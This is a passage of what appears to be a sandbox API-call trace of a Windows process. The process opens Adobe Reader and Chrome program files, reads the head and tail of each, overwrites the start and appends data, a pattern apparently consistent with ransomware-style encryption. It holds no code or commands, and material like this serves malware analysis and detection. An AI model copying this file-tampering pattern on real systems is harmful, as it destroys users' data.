"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1252.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.035] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.035] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x25b5 [0118.035] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.035] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.035] ReleaseMutex (hMutex=0x168) returned 1 [0118.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1252.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1252.TXT", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP1252.TXT", lpUsedDefaultChar=0x0) returned 10 [0118.035] ReadFile (in: hFile=0x1f0, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.039] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x15b5 [0118.039] ReadFile (in: hFile=0x1f0, lpBuffer=0x2865a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.041] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x15b5 [0118.041] WriteFile (in: hFile=0x1f0, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.041] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.041] WriteFile (in: hFile=0x1f0, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.042] CloseHandle (hObject=0x1f0) returned 1 [0118.042] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp932.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.042] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.043] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4a0f2 [0118.043] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.043] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.249] ReleaseMutex (hMutex=0x168) returned 1 [0118.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP932.TXT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0118.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP932.TXT", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP932.TXT", lpUsedDefaultChar=0x0) returned 9 [0118.249] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0118.252] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x490f2 [0118.252] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e963d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.259] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x490f2 [0118.260] WriteFile (in: hFile=0x1f0, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.260] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.260] WriteFile (in: hFile=0x1f0, lpBuffer=0x28da9a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28da9a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.261] CloseHandle (hObject=0x1f0) returned 1 [0118.269] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1031.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1031.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.269] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1031.mst", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1031.mst", lpFilePart=0x2fdf690*="1031.mst") returned 0x64 [0118.270] GetLastError () returned 0x5 [0118.270] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0118.270] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.270] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.270] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0118.270] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0118.270] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0118.270] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1031.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1031.mst")) returned 0x21 [0118.271] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1042.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1042.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.271] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1042.mst", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1042.mst", lpFilePart=0x2fdf690*="1042.mst") returned 0x64 [0118.271] GetLastError () returned 0x5 [0118.271] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0118.271] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.271] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.271] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0118.271] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0118.272] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0118.272] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1042.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1042.mst")) returned 0x21 [0118.272] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1051.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1051.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.272] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1051.mst", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1051.mst", lpFilePart=0x2fdf690*="1051.mst") returned 0x64 [0118.272] GetLastError () returned 0x5 [0118.272] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0118.272] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.272] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.272] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0118.273] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0118.273] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0118.273] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1051.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1051.mst")) returned 0x21 [0118.273] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\AcroRead.msi" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\acroread.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.273] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\AcroRead.msi", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\AcroRead.msi", lpFilePart=0x2fdf690*="AcroRead.msi") returned 0x68 [0118.273] GetLastError () returned 0x5 [0118.273] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0118.274] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.274] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.274] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0118.274] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0118.274] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0118.274] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\AcroRead.msi" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\acroread.msi")) returned 0x21 [0118.275] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\58.0.3029.110.manifest" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\58.0.3029.110.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0118.277] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.277] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe2 [0118.277] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.278] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.278] ReleaseMutex (hMutex=0x168) returned 1 [0118.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="58.0.3029.110.manifest", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0118.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="58.0.3029.110.manifest", cchWideChar=22, lpMultiByteStr=0x1f88d34, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="58.0.3029.110.manifest", lpUsedDefaultChar=0x0) returned 22 [0118.278] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ee41f8, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee41f8*, lpNumberOfBytesRead=0x2fdf2bc*=0xe2, lpOverlapped=0x0) returned 1 [0118.280] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0118.280] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x66a, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x2fdf2d0*=0x66a, lpOverlapped=0x0) returned 1 [0118.284] CloseHandle (hObject=0x1cc) returned 1 [0118.284] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\external_extensions.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\external_extensions.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0118.285] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.285] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4f2 [0118.285] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.285] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.285] ReleaseMutex (hMutex=0x168) returned 1 [0118.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="external_extensions.json", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0118.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="external_extensions.json", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="external_extensions.json", lpUsedDefaultChar=0x0) returned 24 [0118.288] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f3de48, nNumberOfBytesToRead=0x4f2, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3de48*, lpNumberOfBytesRead=0x2fdf2bc*=0x4f2, lpOverlapped=0x0) returned 1 [0118.302] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0118.304] WriteFile (in: hFile=0x1cc, lpBuffer=0x25ae1a8*, nNumberOfBytesToWrite=0xa7a, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25ae1a8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xa7a, lpOverlapped=0x0) returned 1 [0118.304] CloseHandle (hObject=0x1cc) returned 1 [0118.304] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ar.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0118.305] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.305] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6df65 [0118.305] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.305] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.305] ReleaseMutex (hMutex=0x168) returned 1 [0118.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ar.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ar.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ar.pak", lpUsedDefaultChar=0x0) returned 6 [0118.305] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0118.319] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6cf65 [0118.319] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.341] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6cf65 [0118.341] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a8048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a8048*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.342] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.342] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.342] CloseHandle (hObject=0x1cc) returned 1 [0118.343] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-gb.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0118.344] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.344] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4244f [0118.344] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.344] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.344] ReleaseMutex (hMutex=0x168) returned 1 [0118.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="en-GB.pak", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0118.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="en-GB.pak", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="en-GB.pak", lpUsedDefaultChar=0x0) returned 9 [0118.344] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0118.596] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4144f [0118.596] ReadFile (in: hFile=0x1cc, lpBuffer=0x25ac078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.603] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4144f [0118.604] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: 